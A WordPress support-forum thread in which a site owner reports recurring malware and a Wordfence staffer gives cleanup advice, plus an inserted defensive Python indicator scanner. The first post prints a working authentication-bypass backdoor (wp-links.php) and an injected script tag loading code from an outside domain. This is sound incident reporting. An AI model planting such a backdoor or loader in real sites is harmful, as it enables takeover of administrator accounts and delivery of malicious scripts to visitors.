Title: Request for Support – WordPress Malware Issue
Last modified: June 13, 2023

---

# Request for Support – WordPress Malware Issue

 *  Resolved [Helani De SIlva](https://wordpress.org/support/users/helani/)
 * (@helani)
 * [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/)
 * Dear Wordfence Support Team,
 * I am reaching out to seek assistance with a malware issue on my WordPress website.
   I have been experiencing recurring malware injections, and despite my efforts,
   I have been unable to completely resolve the issue.
 * Description of the malware issue:
    - Malicious files: wp-links.php, sw.js, font.js, index.php, google.json
    - File locations:
       * wp-links.php found in the root directory, and occasionally in public_html/wp-includes
       * Additional files in the wp-content folder: index.php and google.json
       * Presence of these malicious files in wp-includes/theme folder and plugin
         folders as well
    - Code injection: The malware injects a script into the theme’s header.php file
      with the following content: `<script>var pm_tag = 'a4s';var pm_pid = "23751-1824878d";</script><script src="//xm.xms.lol/js/pub.min.js" async></script>`
    - Other affected files: There are additional PHP files that I have been unable
      to locate.
    - Malware detection: When Googling the issue, it shows the reason as
      SMW-INJ-21631-php.tool.obf.remote-0.
 * Files in the plugin folders affected by malware:
    - public_html/wp-content/plugins/google-site-kit/google-site-kit.php
    - public_html/wp-content/plugins/pixwell-deal/pixwell-deal.php
    - public_html/wp-content/plugins/elementor/elementor.php
    - public_html/wp-content/plugins/envato-market/envato-market.php
    - public_html/wp-content/plugins/pixwell-core/pixwell-core.php
 * Code snippet from wp-links.php file:
 *     ```wp-block-code
       <?php
       if ( ! defined( 'DIZIN' ) ) {
       define( 'DIZIN', dirname( FILE ) . '/' );
       }
       require_once( DIZIN ."wp-load.php");
   
       $pass = md5(md5(md5($_GET['sifre'])));
       $password = "74de57650aab7115e3c3c1e0507082f6";
       $user_id = $_GET['userid'];
   
       if($pass==$password){
       require_once( DIZIN . 'wp-includes/pluggable.php');
       $user_info = get_userdata($user_id);
       $username = $user_info->user_login;
       $user = get_user_by('login', $username );
   
       if ( !is_wp_error( $user ) )
       {
       wp_clear_auth_cookie();
       wp_set_current_user ( $user->ID );
       wp_set_auth_cookie ( $user->ID );
   
       $redirect_to = user_admin_url();
       wp_safe_redirect( $redirect_to );
   
       exit();
   
       }
   
       }
       ```
   
 * Steps I have taken so far:
    1. Scanned my website using a security plugin, but the malware continues to reappear.
    2. Removed wp-links.php, sw.js, index.php, google.json, and the affected plugin
       files manually from the respective directories.
    3. Checked theme files for suspicious code and removed any identified malicious
       snippets.
    4. Updated WordPress, themes, and plugins to their latest versions.
    5. Changed all passwords related to my website, including admin, FTP, and database.
 * Despite these efforts, the malware keeps reappearing, and I’m unable to find 
   the source of the infection. I would greatly appreciate your assistance in identifying
   and resolving the issue permanently.
 * Please let me know if there are any additional steps I can take or if you require
   any further information to assist me with this matter. Thank you for your time
   and support.
 * Sincerely,
   Helani

Viewing 3 replies - 1 through 3 (of 3 total)
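An added example, not part of the thread and not Wordfence's code: a read-only sweep for the indicators quoted in the opening post. The posted wp-links.php snippet sets an auth cookie for whichever user ID the request names, so the last check looks for that shape in other PHP files; the heuristics, function names and sample tree are assumptions, and every hit is a lead to review, not a verdict.

```python
import os
import re
import tempfile

# Indicators copied from the post above; the matching heuristics are assumptions.
SUSPECT_NAMES = {"wp-links.php", "google.json", "sw.js", "font.js"}
INJECTED_JS = re.compile(rb"xm\.xms\.lol|var\s+pm_tag\s*=")
REQUEST_INPUT = re.compile(rb"\$_(GET|POST|REQUEST|COOKIE)\s*\[")
AUTH_CALL = re.compile(rb"wp_set_auth_cookie\s*\(")  # with REQUEST_INPUT: shape of wp-links.php
TEXT_EXT = (".php", ".js", ".json", ".html")

def scan(root):
    """Walk a WordPress tree; return sorted (relative_path, reason) leads."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name in SUSPECT_NAMES:
                findings.append((rel, "filename listed in the post"))
            if not name.lower().endswith(TEXT_EXT):
                continue
            try:
                with open(path, "rb") as fh:
                    data = fh.read(2_000_000)  # bound memory per file
            except OSError:
                continue  # unreadable file: skip, do not abort the scan
            if INJECTED_JS.search(data):
                findings.append((rel, "injected script marker"))
            if name.endswith(".php") and AUTH_CALL.search(data) and REQUEST_INPUT.search(data):
                findings.append((rel, "auth cookie set from request input"))
    return sorted(findings)

def build_sample_tree(root):
    """Constructed sample: one clean file and two files shaped like the post's."""
    samples = {
        "wp-links.php": b"<?php $u = $_GET['userid']; wp_set_auth_cookie( $u );",
        "wp-content/themes/demo/header.php": b"<script>var pm_tag = 'x';</script>",
        "wp-content/themes/demo/footer.php": b"<?php wp_footer(); ?>",
    }
    for rel, body in samples.items():
        os.makedirs(os.path.dirname(os.path.join(root, rel)), exist_ok=True)
        with open(os.path.join(root, rel), "wb") as fh:
            fh.write(body)

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_tree(tmp)
        print("\n".join(f"{p}: {why}" for p, why in scan(tmp)))
```

Legitimate core code that defines or calls `wp_set_auth_cookie` can also match the last check, and `sw.js` is a common name for real service workers, so compare hits against a clean copy of the same WordPress, theme and plugin versions before deleting anything.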

 *  Plugin Support [wfpeter](https://wordpress.org/support/users/wfpeter/)
 * (@wfpeter)
 * [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/#post-16814720)
 * Hi [@helani](https://wordpress.org/support/users/helani/), I’m sorry to see you’ve
   been having recurring issues like this.
 * If you haven’t already, carefully follow the checklist we provide for site admins
   to try cleaning their own sites: [https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/](https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/)
 * I’ll always be sure to encourage you to update all plugins and themes along with
   running the latest WordPress core if you haven’t already. WordPress sometimes
   patches their older releases if they find a vulnerability so make sure to update
   your version if needed. We, of course, recommend that you update to the latest
   version.
 * **As a rule, any time I think someone’s site has been compromised I also tell
   them to update their passwords for their hosting control panel, FTP, WordPress
   admin users, and database. Make sure to do this.**
 * Additionally you might find the WordPress Malware Removal section in [our free Learning Center](https://wordfence.com/learn/)
   helpful if you haven’t explored it already.
 * In terms of the particular files and code snippets you’ve shown here, if the 
   above documentation doesn’t fully help, our threat intelligence team can assist.
   Providing files you’ve found to **samples @ wordfence . com** can assist you 
   and other customers if Wordfence isn’t currently picking up a threat. Often, 
   we will have rules already but the code may be obfuscated in a way the plugin
   hasn’t seen before.
 * **Remember to obscure/remove any passwords or keys/salts in any files you do 
   send to us.**
 * If you are unable to clean this on your own there are paid services that will
   do it for you. Wordfence offers one and there are others. Regardless of whether
   you choose to clean it yourself or let someone else do it – we recommend that
   you make a **full backup** of the site beforehand.
 * Thanks,
   Peter.
 *  Thread Starter [Helani De SIlva](https://wordpress.org/support/users/helani/)
 * (@helani)
 * [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/#post-16817357)
 * Hello,
 * Thank you for your reply. I want to correct my previous forum post:
    - Malware detection: When **Googling** the issue, it shows the reason as
      **SMW-INJ-21631-php.tool.obf.remote-0**.
 * Files in the plugin folders affected by malware:
    - public_html/wp-content/plugins/google-site-kit/google-site-kit.php
    - public_html/wp-content/plugins/pixwell-deal/pixwell-deal.php
    - public_html/wp-content/plugins/elementor/elementor.php
    - public_html/wp-content/plugins/envato-market/envato-market.php
    - public_html/wp-content/plugins/pixwell-core/pixwell-core.php
 * like this. But it’s not fully correct.
    - Malware detection: When using **ImunifyAV** the issue, it shows the reason
      as **SMW-INJ-21631-php.tool.obf.remote-0**.
 * Files in the plugin folders affected by malware:
    - public_html/wp-content/plugins/google-site-kit/google-site-kit.php
    - public_html/wp-content/plugins/pixwell-deal/pixwell-deal.php
    - public_html/wp-content/plugins/elementor/elementor.php
    - public_html/wp-content/plugins/envato-market/envato-market.php
    - public_html/wp-content/plugins/pixwell-core/pixwell-core.php
 * And I would like to get help from you to solve this issue. I already mailed you before
   submitting this forum post here. Anyway, I mail to you again.
 * Thank you,
 * Helani
 *  Thread Starter [Helani De SIlva](https://wordpress.org/support/users/helani/)
 * (@helani)
 * [2 years, 11 months ago](https://wordpress.org/support/topic/request-for-support-wordpress-malware-issue/#post-16826358)
 * Hello,
 * I already got the Wordfence Care, but you still can’t give the permanent solution
   for me.
 * I only need **permanent** solution.
 * Thank you,
 * Helani
